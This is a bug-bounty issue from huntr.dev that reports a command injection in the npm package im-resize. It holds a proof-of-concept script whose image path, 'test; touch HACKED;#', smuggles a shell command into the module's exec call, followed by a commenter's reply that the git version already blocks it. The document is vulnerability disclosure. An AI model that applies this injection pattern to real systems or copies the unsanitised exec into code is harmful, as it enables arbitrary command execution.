huntr.dev - Command Injection
huntr-helper opened this issue · 1 comment
This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)
Vulnerability Description
The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115
Steps To Reproduce:
- Create the following PoC file:

    // poc.js
    var resize = require('im-resize');
    // The image path carries shell metacharacters; the module interpolates it into a shell command
    var image = {
      path: 'test; touch HACKED;#',
      width: 5184,
      height: 2623
    };
    var output = {
      versions: [{
        suffix: '-thumb',
        maxHeight: 150,
        maxWidth: 150,
        aspect: "3:2"
      }, {
        suffix: '-square',
        maxWidth: 200,
        aspect: "1:1"
      }]
    };
    resize(image, output, function(error){ console.log(); });
- Check that there are no files called HACKED
- Execute the following commands in another terminal:
npm i im-resize # Install affected module
node poc.js # Run the PoC
- Recheck the files: now HACKED has been created
Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
The NPM version is vulnerable, but I think this bug is a false positive for the git version, since code injection is mitigated in:
https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L10
In commit de624da of Feb 3
Instead of using the npm version, the test should be executed against the git version, after cloning, like:
    // poc.js
    //var resize = require('im-resize');
    var resize = require('./');   // load the cloned git checkout instead of the npm package
    var image = {
      path: 'test; touch HACKED;#',
      width: 5184,
      height: 2623
    };
    var output = {
      versions: [{
        suffix: '-thumb',
        maxHeight: 150,
        maxWidth: 150,
        aspect: "3:2"
      }, {
        suffix: '-square',
        maxWidth: 200,
        aspect: "1:1"
      }]
    };
    resize(image, output, function(error){ console.log(); });
execute by:
npm i aspectratio # Install required module
node poc.js # Run the PoC
Will yield:
Input Validation failed, Suspicious Characters found
stopping execution and avoiding code injection
exec is called in https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L13 so trying to call directly https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115 will produce a string and not code execution.
PS. I would suggest granting the bounty considering the time it took me to test and document this as well as helping improve huntr bug quality